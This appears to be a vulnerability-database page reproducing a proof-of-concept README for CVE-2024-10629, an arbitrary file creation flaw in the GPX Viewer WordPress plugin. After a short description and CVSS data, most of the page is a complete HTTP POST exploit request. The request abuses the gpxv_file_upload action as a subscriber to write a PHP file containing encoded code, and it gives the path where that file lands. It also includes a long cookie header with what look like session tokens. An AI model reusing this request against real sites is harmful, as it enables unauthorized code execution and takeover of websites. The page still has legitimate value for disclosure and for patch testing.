来源

关联漏洞

描述

GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation

介绍

# CVE-2024-10629
GPX Viewer <= 2.2.8 - Authenticated (Subscriber+) Arbitrary File Creation

# Description:
The GPX Viewer plugin for WordPress is vulnerable to arbitrary file creation due to a missing capability check and file type validation in the gpxv_file_upload() function in all versions up to, and including, 2.2.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to create arbitrary files on the affected site's server which may make remote code execution possible.


```
Published: 2024-11-12 13:21:00
CVE: CVE-2024-10629
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: gpx-viewer
```

POC
---

Login as a standard user

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://kubernetes.docker.internal/wp-admin/admin.php?page=gpx_admin
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
Origin: http://kubernetes.docker.internal
Connection: keep-alive
Cookie: tm_member=172.21.0.1; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C2d7486450bf41812303a58d1fbafe518ef19b8073d4e664c09bf94377ca17fe7; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D5%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; hashcaf=#layoutstab; hashcafsub=post-layout; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731498720%7C%7C1731495120%7C%7C2c258c1ff57491a59c854505530207f7; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731579764%7CMtKoW3f233d5qnISbYVUXr4c22ixG9QMcdHzWXyvU5o%7C7e8c9e15242ca5cf7bc38fb82a5a51c0b8024a364cc5b62472935180754b64df; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731406964
Upgrade-Insecure-Requests: 1
Priority: u=0, i

action=gpxv_file_upload&category=uncategorized&filename=example.php&gpx=%3c%3fphp%20phpinfo()%3b%3f%3e&update=false&clean=false
```

Goes to `/wp-content/uploads/gpx/uncategorized/example.php`

文件快照

 [4.0K]  /data/pocs/85250d68d01cc3857182462834438394477abc07
└── [3.5K]  README.md

0 directories, 1 file

备注